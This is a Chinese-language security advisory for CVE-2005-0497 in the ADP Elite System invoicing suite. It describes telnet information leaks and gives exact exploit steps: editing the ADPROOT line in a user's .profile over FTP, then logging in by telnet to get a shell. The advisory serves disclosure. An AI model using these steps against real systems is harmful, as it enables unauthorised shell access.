发布日期：2005-02-19
更新日期：2005-02-23

受影响系统：

Adp Elite System Max 9000 Series

描述：

---

CVE(CAN) ID: CVE-2005-0497

Adp Elite system是一款发票/采购订购套件。

Adp Elite system对用户TELNET和FTP访问缺少充分限制，远程攻击者可以利用这些漏洞获得SHELL。

Adp Elite system整个程序基于Telnet系统，当用户通过telnet登录时，会泄露很多信息。用户通过FTP登录系统更改用户.profile，然后再telnet就可以获得SHELL。

<*来源：rootfiend （rootfiend@safe-mail.net）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=110901051420503&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

下载.profile文件，更改：

# ADPROOT is equivalent to REALROOT on CoRA systems
ADPROOT=${ADPROOT:="/adp"}
export ADPROOT

为

# ADPROOT is equivalent to REALROOT on CoRA systems
ADPROOT=${ADPROOT:="/"}
export ADPROOT

并上传，再telnet获得SHELL。

建议：

---

厂商补丁：

Adp
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.adp.com/

浏览次数：2621
严重程度：0（网友投票）